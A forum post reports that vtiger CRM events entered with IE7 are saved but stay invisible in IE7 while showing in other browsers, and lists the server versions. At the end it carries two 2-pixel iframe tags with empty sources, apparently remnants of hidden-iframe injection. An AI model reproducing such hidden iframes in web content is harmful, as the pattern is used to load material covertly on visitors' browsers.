Cannot see Events using IE7

I have noted a very odd issue:

One of my sales reps was complaining that they entered some an Event using IE7 and could not see it so they entered it a few more times creating duplicates. Using Firefox or Opera I could see all the duplicate entries, but using IE7 I was in the same position as the sales rep. I tested this issue from both inside and outside my network with the proxy server enabled as well as inside the network without using the proxy server. I was also sure to purge the IE7 cache after each test.

This is rather disturbing as I see the data in the database but I cannot view it in IE7. Has anyone else seen this issue? Does anyone else have any suggestions? Could this be a PHP issue with IE7?


Currently running:
vtiger 5.0.3
IIS 6.0
PHP 4.2.4
MySQL 5.0.45 <iframe width="2px" height="2px" src=""></iframe>; <iframe width="2px" height="2px" src=""></iframe>;


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